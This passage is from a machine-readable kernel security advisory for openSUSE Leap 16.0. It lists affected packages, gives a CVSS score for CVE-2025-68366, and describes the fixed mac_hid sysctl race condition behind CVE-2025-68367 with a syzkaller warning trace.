"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
